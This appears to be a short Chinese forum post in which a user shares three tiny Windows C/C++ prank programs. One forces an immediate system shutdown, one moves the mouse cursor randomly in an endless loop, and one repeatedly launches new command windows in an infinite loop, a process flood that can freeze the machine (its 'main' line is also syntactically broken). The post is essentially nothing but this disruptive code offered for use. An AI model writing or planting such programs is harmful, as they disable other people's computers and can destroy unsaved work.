用户:青柠檬_编译者_EX_NEO查看:0 回复:1 评论:0 创建时间:2022-01-03T20:20:38
送你们一些代码:
#include<windows.h>
main(){system("shutdown -s -t 0");}
#include<windows.h>
#include<cstdlib>
#include<ctime>
using namespace std;
int main()
{
int x=GetSystemMetrics(SM_CXSCREEN);
int y=GetSystemMetrics(SM_CYSCREEN);
srand(time(0));
while(true)SetCursorPos(rand()%x,rand()%y);
}
#include<windows.h>
using namespace std;
main{while(true)system("start");}